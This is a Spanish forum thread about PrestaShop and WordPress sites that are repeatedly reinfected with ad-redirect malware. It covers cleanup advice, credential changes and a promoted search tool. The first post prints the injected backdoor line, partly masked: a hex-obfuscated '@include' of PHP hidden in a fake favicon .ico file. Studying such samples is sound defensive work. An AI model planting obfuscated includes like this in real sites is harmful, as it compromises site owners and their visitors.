Malware redirecciones en Wordpress y Prestashop

[alex_aic]

Desde hace un tiempo a esta parte, nos encontramos con que tanto Wordpress como Prestashop, en la tienda de un cliente realiza redirecciones publicitarias ajenas a su empresa. Dichas redirecciones son aleatorias y las puedes encontrar en el fuente con un código similar a este:

 

index.php (prestashop)

/*dd2f1*/

@include "\x2fh\x6fm\***/\****\x77m\x78d\x70c\x2fp\****\x6ci\x63_\****\x6dl\x2ft\x69e\****\x61/\x6do\x64u\****\x73/\x62l\x6fc\****\x79a\x63c\x6fu\x6et\x66o\x6ft\x65r\x2ff\x61v\x69c\x6fn\x5f3\x667\x637\x63.\x69c\x6f";

/*dd2f1*/

Una vez limpias los ficheros que contienen dicha cadena, al cabo del tiempo vuelve a aparecer. Hemos cambiado incluso de hosting, con claves y usuarios nuevos tanto en base de datos como FTP pero sigue sucediendo. ¿Alguna idea?

 

He editado el contenido del include, porque al desencriptarlo me ha sacado una ruta desde el raíz hasta un fichero .ico que os comento en una respuesta próxima.

Edited June 26, 2017 by alex_aic (see edit history)

[Enrique Gómez]

Hola, por el foro hay varios casos similares al tuyo

lo primero es mirar de localizar el agujero.. en la parte de worpdress no te puedo ayudar pero debes tener todo actualizado (sobretodo plugins...)

 

En prestashop revisa este post para ver si estas en uno de esos casos

https://www.prestashop.com/forums/topic/544579-major-security-issues-with-few-modules-and-themes/

 

P.ej si tiene el tema warehouse había varios módulos incluidos que hay que actulizar. También el attribute wizard pro y  otros módulos..

 

Una vez localizado y aplicada la solución viene la parte mas tediosa ya que se te habrán metido hasta en la cocina..   Es decir puede haber modficación y creación de ficheros en cualquier punto, lo que quiere decir que como no tengas un backup limpio hay que buscar y limpiar cualquier código o fichero malicioso.

 

El mismo autor de warehouse publico una guia para limpiar http://iqit-commerce.com/securityhotfix/. Esto sirve para cualquer web y se trata de usar patrones de búsqueda para detectar ficheros modificados y ficheros anómalos.

[ventura]

Si accedes a los archivos por ftp remoto (Filezilla, WinSCP...) revisa también que los equipos desde los que accedas a estos archivos estén completamente limpios de rootkits o cualquier tipo de malware.

[alex_aic]

Buenas, 

 

Tengo Prestashop actualizado, no poseemos plugins excepto los propios que vienen con Prestashop y el theme es el que viene por defecto. Desde finales del año pasado fue cuando empezamos a detectar esta historia. La instalación de ambos CMS la llevamos arrastrando desde 2014 con actualizaciones incluídas y sin problemas como os comentaba desde hace unos meses. Limpiamos manualmente los includes y poco después vuelven a aparecer, incluso llegando a desencriptar la cadena del include, apuntaba a un fichero .ico que en realidad contenía código y limpiamos el directorio y eliminamos todos los ficheros .ico sospechosos. A los días, otra vez. Así que sí, seguramente lo tendremos como comentas hasta en la cocina. 

 

Imagino que tendríamos que modificar claves de acceso FTP, realizar una instalación en limpio, pero claro, los ficheros como fotos o adjuntos podríamos volver a subirlos? Los antivirus convencionales no detectan nada ya que son script PHP con @include o similar y no van a detectar nada malo. Por otra parte, la base de datos se podría rescatar? ¿Qué tablas tendríamos que revisar? Tendríamos que conservar histórico de pedidos, pedidos en curso (carritos) y demás, artículos,... Más que nada para no tener que iniciar todo desde cero.

[alex_aic]

Os adjunto el resultado de desencriptar el include. Apuntaba a ese fichero .ico

[alex_aic]

Os adjunto el fichero favicon_3F7C7C.ico que al cambiarle la extensión a PHP resulta ser un script.

favicon_3f7c7c.php

[alex_aic]

Al final no me quedó más remedio que:

• Limpiar manualmente todos los archivos, descargando todo el proyecto a local y buscando cadenas de texto en todo el proyecto
• Una vez limpio, resubirlo al sitio pero no sin antes cambiar las claves de base de datos, ftp y dashboard
• En principio actualmente está todo limpio, hemos contratado un servicio de siteLocker para que nos haga una auditoria durante este mes para verificar que todo anda ok y por el momento funciona todo bien

Una faena interesante. La instalación era toda "default", sin theme, sin plugins excepto el de la pasarela de pagos que nos lo facilitó el banco, y en fin... Hemos tenido mala suerte. Copias de seguridad muy recomendables. (En casa del herrero,...)

[LieBM]

Buenas,

hemos desarrollado una herramienta para poder buscar cualquier tipo de contenido, archivo, etc.. dentro del directorio donde se instale el script. 

En los resultados de búsqueda, se muestra la ruta del archivo, la línea donde se encuentra el contenido encontrado y demás información.

Con este sistema se podrá encontrar código malicioso o restos de código hackeado y hacer la limpieza de forma segura y rápida.

https://www.liewebs.com/search-tool-pro-herramienta-buscador/

 

Saludos.